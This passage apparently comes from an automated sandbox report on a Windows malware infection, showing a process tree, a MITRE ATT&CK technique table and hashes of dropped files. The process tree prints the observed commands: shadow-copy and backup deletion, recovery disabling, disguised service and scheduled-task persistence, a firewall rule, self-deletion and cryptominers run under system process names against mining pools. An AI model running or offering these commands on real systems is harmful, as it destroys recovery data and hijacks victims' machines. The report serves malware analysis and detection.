                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lpwacfvh.exe" C:\Windows\SysWOW64\oylzbihg\
                                                                2⤵
                                                                  PID:4384
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  "C:\Windows\System32\sc.exe" create oylzbihg binPath= "C:\Windows\SysWOW64\oylzbihg\lpwacfvh.exe /d\"C:\Users\Admin\AppData\Local\Temp\CDE0.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                  2⤵
                                                                    PID:1604
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    "C:\Windows\System32\sc.exe" description oylzbihg "wifi internet conection"
                                                                    2⤵
                                                                      PID:5164
                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                      "C:\Windows\System32\sc.exe" start oylzbihg
                                                                      2⤵
                                                                        PID:4784
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                        2⤵
                                                                          PID:3692
                                                                      • C:\Users\Admin\AppData\Local\Temp\D2E2.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\D2E2.exe
                                                                        1⤵
                                                                          PID:5236
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im D2E2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D2E2.exe" & del C:\ProgramData\*.dll & exit
                                                                            2⤵
                                                                              PID:5540
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im D2E2.exe /f
                                                                                3⤵
                                                                                • Kills process with taskkill
                                                                                PID:3180
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                3⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:5244
                                                                          • C:\Users\Admin\AppData\Local\Temp\DDE0.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\DDE0.exe
                                                                            1⤵
                                                                              PID:4644
                                                                            • C:\Users\Admin\AppData\Local\Temp\E0FD.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\E0FD.exe
                                                                              1⤵
                                                                                PID:752
                                                                                • C:\Users\Admin\AppData\Local\Temp\E0FD.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\E0FD.exe" -agent 0
                                                                                  2⤵
                                                                                    PID:5904
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                    2⤵
                                                                                      PID:4696
                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                        vssadmin delete shadows /all /quiet
                                                                                        3⤵
                                                                                        • Interacts with shadow copies
                                                                                        PID:1096
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                      2⤵
                                                                                        PID:5688
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                        2⤵
                                                                                          PID:4616
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                          2⤵
                                                                                            PID:5820
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                            2⤵
                                                                                              PID:5464
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                wmic shadowcopy delete
                                                                                                3⤵
                                                                                                  PID:2172
                                                                                            • C:\Users\Admin\AppData\Local\Temp\E1F8.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\E1F8.exe
                                                                                              1⤵
                                                                                                PID:4800
                                                                                              • C:\Windows\SysWOW64\oylzbihg\lpwacfvh.exe
                                                                                                C:\Windows\SysWOW64\oylzbihg\lpwacfvh.exe /d"C:\Users\Admin\AppData\Local\Temp\CDE0.exe"
                                                                                                1⤵
                                                                                                  PID:5736
                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                    svchost.exe
                                                                                                    2⤵
                                                                                                      PID:5860
                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                        3⤵
                                                                                                          PID:5836
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E43C.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\E43C.exe
                                                                                                      1⤵
                                                                                                        PID:4368
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 1244
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:5832
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EF58.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\EF58.exe
                                                                                                        1⤵
                                                                                                          PID:1016
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"
                                                                                                            2⤵
                                                                                                              PID:4400
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                3⤵
                                                                                                                  PID:5948
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                    4⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:6024
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                  3⤵
                                                                                                                    PID:5576
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                      4⤵
                                                                                                                        PID:3936
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                          5⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:5920
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                        4⤵
                                                                                                                          PID:5696
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=YS --pass=a=randomx --cpu-max-threads-hint=30 --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
                                                                                                                          4⤵
                                                                                                                            PID:4800
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"
                                                                                                                        2⤵
                                                                                                                          PID:4204
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
                                                                                                                            3⤵
                                                                                                                              PID:4208
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
                                                                                                                                4⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:5828
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\services32.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                                                                                                                              3⤵
                                                                                                                                PID:5892
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
                                                                                                                                  4⤵
                                                                                                                                    PID:5500
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
                                                                                                                                      5⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:5028
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:5780
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F11E.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\F11E.exe
                                                                                                                                1⤵
                                                                                                                                  PID:1096
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F3EE.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F3EE.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5684
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:204
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5668
                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5852
                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5760
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:6100
                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:5964
                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:4184
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4384
                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3976
                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5188
                                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5636

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                        Execution

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Persistence

                                                                                                                                                        Modify Existing Service

                                                                                                                                                        2
                                                                                                                                                        T1031

                                                                                                                                                        New Service

                                                                                                                                                        1
                                                                                                                                                        T1050

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1060

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        BITS Jobs

                                                                                                                                                        1
                                                                                                                                                        T1197

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        New Service

                                                                                                                                                        1
                                                                                                                                                        T1050

                                                                                                                                                        Scheduled Task

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Modify Registry

                                                                                                                                                        2
                                                                                                                                                        T1112

                                                                                                                                                        Disabling Security Tools

                                                                                                                                                        1
                                                                                                                                                        T1089

                                                                                                                                                        File Deletion

                                                                                                                                                        2
                                                                                                                                                        T1107

                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                        1
                                                                                                                                                        T1497

                                                                                                                                                        BITS Jobs

                                                                                                                                                        1
                                                                                                                                                        T1197

                                                                                                                                                        Credential Access

                                                                                                                                                        Credentials in Files

                                                                                                                                                        3
                                                                                                                                                        T1081

                                                                                                                                                        Discovery

                                                                                                                                                        Query Registry

                                                                                                                                                        6
                                                                                                                                                        T1012

                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                        1
                                                                                                                                                        T1497

                                                                                                                                                        System Information Discovery

                                                                                                                                                        6
                                                                                                                                                        T1082

                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                        1
                                                                                                                                                        T1120

                                                                                                                                                        Remote System Discovery

                                                                                                                                                        1
                                                                                                                                                        T1018

                                                                                                                                                        Collection

                                                                                                                                                        Data from Local System

                                                                                                                                                        3
                                                                                                                                                        T1005

                                                                                                                                                        Command and Control

                                                                                                                                                        Web Service

                                                                                                                                                        1
                                                                                                                                                        T1102

                                                                                                                                                        Impact

                                                                                                                                                        Inhibit System Recovery

                                                                                                                                                        2
                                                                                                                                                        T1490

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                          MD5

                                                                                                                                                          ed841d4c457ead52231fd3a2ccf235eb

                                                                                                                                                          SHA1

                                                                                                                                                          3c3e63ebce85e0ad02116131fa358f15bd685aaa

                                                                                                                                                          SHA256

                                                                                                                                                          1b71a0b2da18c33c8067989139712715013e134c0df6fd9d9a99944d665a182d

                                                                                                                                                          SHA512

                                                                                                                                                          da144b6500c3fa6e3becb02b9507424e28b4514c410ccc65c2bf2fde457076edef5de8130832d06e3d985bbbdb7ac132df8bf6aced68d9c5fc1ca27868f3fcc1

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                          MD5

                                                                                                                                                          1d17423a140ffeb7e39e9b22456eaa34

                                                                                                                                                          SHA1

                                                                                                                                                          15df7829da95d7b417bddd00fe57f2979e2ac79f

                                                                                                                                                          SHA256

                                                                                                                                                          72f5dac3d60e017cdfe5b662a55c6256dad35d28ea300c3528bfb9f0ca99a118

                                                                                                                                                          SHA512

                                                                                                                                                          ebe030f219c5832bef91818b1ec536a301ae15cf2eb2698ded62bfc58e0f183543b8b4bd5e645e01d8e6cc4312d236f92dbb8a9b66f8582c0d332d7388c0d7ef

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                          MD5

                                                                                                                                                          9be84148228d38d8a7aa04aa003ae49a

                                                                                                                                                          SHA1

                                                                                                                                                          83e6cafe58a6ad820ef295825f0d403e55710aae

                                                                                                                                                          SHA256

                                                                                                                                                          eae2eb93230894f646f45cec38cc20b03f5075e8b5b6c6639dc487c35e7ad573

                                                                                                                                                          SHA512

                                                                                                                                                          eb85383b426ec5cd211fafceaf24d438c8a0d6ac43be2cf9802748de505ada0b4d008548a08834dcc86b4c1b0e3fa5c1a4762e54ab5f6e55ea900e535bc4b578

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                          MD5

                                                                                                                                                          c73e08a1e7d79d94009656cab9f40c66

                                                                                                                                                          SHA1

                                                                                                                                                          39d3d6561a206ad8d7e9f0d033da39df3bdc0881

                                                                                                                                                          SHA256

                                                                                                                                                          4ddf50e75ea9327f2bcb7dc494477a5e57e9716920ba6844045005d1f053098d

                                                                                                                                                          SHA512

                                                                                                                                                          96eb55a2db14d622c0d470322ce17f0390eaac7265875ba57c521d5e4a71c6b59055cf8db3e63e16bd5bae24c0fd7430ab08c9441c7996822c57dccdd277b65b

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                          MD5

                                                                                                                                                          77238d771db607927c012a3e37200bea

                                                                                                                                                          SHA1

                                                                                                                                                          3e9bdcde817ce126bde56703cb3ffc5e8db35e34

                                                                                                                                                          SHA256

                                                                                                                                                          b6c2c7cc901520d39ed337a11930456b4c0990e689c2858172ce716757371fc3

                                                                                                                                                          SHA512

                                                                                                                                                          6ba42e3bc1761240e50bac47d606521f9f737016dee68751e852b13bacd6dc43ab5fd2feb915a9bbc21023c6b43fd8ad07565cc3e12bbac2be65d17cbd70344f

                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                          MD5

                                                                                                                                                          f78b9478c473d02947fdfc17c1787270

                                                                                                                                                          SHA1

                                                                                                                                                          2c5c2cd674a5f82fab421ffe0649c8d30aec4604

                                                                                                                                                          SHA256

                                                                                                                                                          dc169864db764d144a4ce424f12609d1569929febbe6a56645d74b83891311b8

                                                                                                                                                          SHA512

                                                                                                                                                          65d27a4d8f9d2af2cf4c8860c915ee67766bd286c50bfa3d9b31489f9f3c02932058722d844df8b095ab70a920b303978e14dd93c935e34ccc85f75e803c0055

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                          MD5

                                                                                                                                                          cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                                                          SHA1

                                                                                                                                                          b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                                                          SHA256

                                                                                                                                                          0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                                                          SHA512

                                                                                                                                                          4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                          MD5

                                                                                                                                                          cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                                                          SHA1

                                                                                                                                                          b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                                                          SHA256

                                                                                                                                                          0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                                                          SHA512

                                                                                                                                                          4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Compatto.rtf
                                                                                                                                                          MD5

                                                                                                                                                          b96b1288ce038869fb15d4353f760613

                                                                                                                                                          SHA1

                                                                                                                                                          5a6f01cb0546a6dd4ae1e90279aaa82bdd672b60

                                                                                                                                                          SHA256

                                                                                                                                                          2c1458ecd2cc31a6d798a1c6396926cb99a66481832f774dbdbc19594ff9bd40

                                                                                                                                                          SHA512

                                                                                                                                                          36a72a5cac8b1aaa395d9efc2fc79b4525e408c57cebaaf2f00c1ba5b51bc08ee22e5676055cdcc961197c05e41d020c8d74b0d95426095d1a5b04fb14d3b04e

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Incontrati.rtf
                                                                                                                                                          MD5

                                                                                                                                                          2159edf39246faecd80a5bb1638b0212

                                                                                                                                                          SHA1

                                                                                                                                                          44930f0fe67b06a73c57ff56976894632890aa6b

                                                                                                                                                          SHA256

                                                                                                                                                          8dec7534543bc983bcd6965539e3d26de768775ac117a108b545a5b4e3bb3614

                                                                                                                                                          SHA512

                                                                                                                                                          49b34aab60b12e98da6f521adf6d4c3ced8245df327a84b8c39d096fc26916ed95ddc212fb05558cf801213e62b5c40cba6cd5cde321f4d23af8bd7e54694a33

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Oggi.rtf
                                                                                                                                                          MD5

                                                                                                                                                          916c4387e392f4f3c300d18dc396b739

                                                                                                                                                          SHA1

                                                                                                                                                          c7b480305599093ed6f88f5d8597fc5facc7cb3e

                                                                                                                                                          SHA256

                                                                                                                                                          d574f83fc092c037db7625e3b2dbe16a4898f9e8ec187c3a5744c699bdb5b75e

                                                                                                                                                          SHA512

                                                                                                                                                          9166b8ff071f067bbd31f39c2201285dc1c2096c693849006554a8ca0201b8d43b2ad0c786b5bb4bdfe897870d0609bc6011aaf8baee1456a473045ea9189584

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                                                                                                                                          MD5

                                                                                                                                                          c56b5f0201a3b3de53e561fe76912bfd

                                                                                                                                                          SHA1

                                                                                                                                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                                                                                          SHA256

                                                                                                                                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                                                                                          SHA512

                                                                                                                                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                                                                                                                                          MD5

                                                                                                                                                          c56b5f0201a3b3de53e561fe76912bfd

                                                                                                                                                          SHA1

                                                                                                                                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                                                                                          SHA256

                                                                                                                                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                                                                                          SHA512

                                                                                                                                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Troverai.rtf
                                                                                                                                                          MD5

                                                                                                                                                          7fa88f5686ca445f2a90cb05d761975f

                                                                                                                                                          SHA1

                                                                                                                                                          1ffd9e0375a825deb059121951ce81844f97d527

                                                                                                                                                          SHA256

                                                                                                                                                          94b01919c10661d96e0f8ccf05e143b76d94cae3dafc0e5cc7998d22b060ad1a

                                                                                                                                                          SHA512

                                                                                                                                                          379cd229c1a5af95ab3a67943338879e0ef7fc971a51a56ad68997b38a8de69f6694e8e4dc497f174dee46740efd35f580258b29b5ac385c2ae8c837a6d94460

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\n
                                                                                                                                                          MD5

                                                                                                                                                          7fa88f5686ca445f2a90cb05d761975f

                                                                                                                                                          SHA1

                                                                                                                                                          1ffd9e0375a825deb059121951ce81844f97d527

                                                                                                                                                          SHA256

                                                                                                                                                          94b01919c10661d96e0f8ccf05e143b76d94cae3dafc0e5cc7998d22b060ad1a

                                                                                                                                                          SHA512

                                                                                                                                                          379cd229c1a5af95ab3a67943338879e0ef7fc971a51a56ad68997b38a8de69f6694e8e4dc497f174dee46740efd35f580258b29b5ac385c2ae8c837a6d94460

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\libcurl.dll
                                                                                                                                                          MD5

                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                          SHA1

                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                          SHA256

                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                          SHA512

                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\libcurlpp.dll
                                                                                                                                                          MD5

                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                          SHA1

                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                          SHA256

                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                          SHA512

                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\libgcc_s_dw2-1.dll
                                                                                                                                                          MD5

                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                          SHA1

                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                          SHA256

                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                          SHA512

                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\libstdc++-6.dll
                                                                                                                                                          MD5

                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                          SHA1

                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                          SHA256

                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                          SHA512

                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\libwinpthread-1.dll
                                                                                                                                                          MD5

                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                          SHA1

                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                          SHA256

                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                          SHA512

                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_1.exe
                                                                                                                                                          MD5

                                                                                                                                                          a30209d1cbb79a6af44aaa3f0240bfac

                                                                                                                                                          SHA1

                                                                                                                                                          34a71c0dc1a837ba78aa86f9dc3dde6fa8570eda

                                                                                                                                                          SHA256

                                                                                                                                                          c3759b2ce602b3575af5ba376446815a132f77e4b05c48f12ef0b512f9025bc4

                                                                                                                                                          SHA512

                                                                                                                                                          0e217d0d587ea85422f8b4f36e6bba9dbef7f6a4f2fdac8aa106fb9150848fbaf6a6cd1c864c282eb0a386c3e26ba158747bd099e9f5eb3ed6e689a56814fe34

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_1.exe
                                                                                                                                                          MD5

                                                                                                                                                          a30209d1cbb79a6af44aaa3f0240bfac

                                                                                                                                                          SHA1

                                                                                                                                                          34a71c0dc1a837ba78aa86f9dc3dde6fa8570eda

                                                                                                                                                          SHA256

                                                                                                                                                          c3759b2ce602b3575af5ba376446815a132f77e4b05c48f12ef0b512f9025bc4

                                                                                                                                                          SHA512

                                                                                                                                                          0e217d0d587ea85422f8b4f36e6bba9dbef7f6a4f2fdac8aa106fb9150848fbaf6a6cd1c864c282eb0a386c3e26ba158747bd099e9f5eb3ed6e689a56814fe34

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_1.txt
                                                                                                                                                          MD5

                                                                                                                                                          a30209d1cbb79a6af44aaa3f0240bfac

                                                                                                                                                          SHA1

                                                                                                                                                          34a71c0dc1a837ba78aa86f9dc3dde6fa8570eda

                                                                                                                                                          SHA256

                                                                                                                                                          c3759b2ce602b3575af5ba376446815a132f77e4b05c48f12ef0b512f9025bc4

                                                                                                                                                          SHA512

                                                                                                                                                          0e217d0d587ea85422f8b4f36e6bba9dbef7f6a4f2fdac8aa106fb9150848fbaf6a6cd1c864c282eb0a386c3e26ba158747bd099e9f5eb3ed6e689a56814fe34

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_2.exe
                                                                                                                                                          MD5

                                                                                                                                                          7154363f6af0bfafe02f1ed75d45ba1e

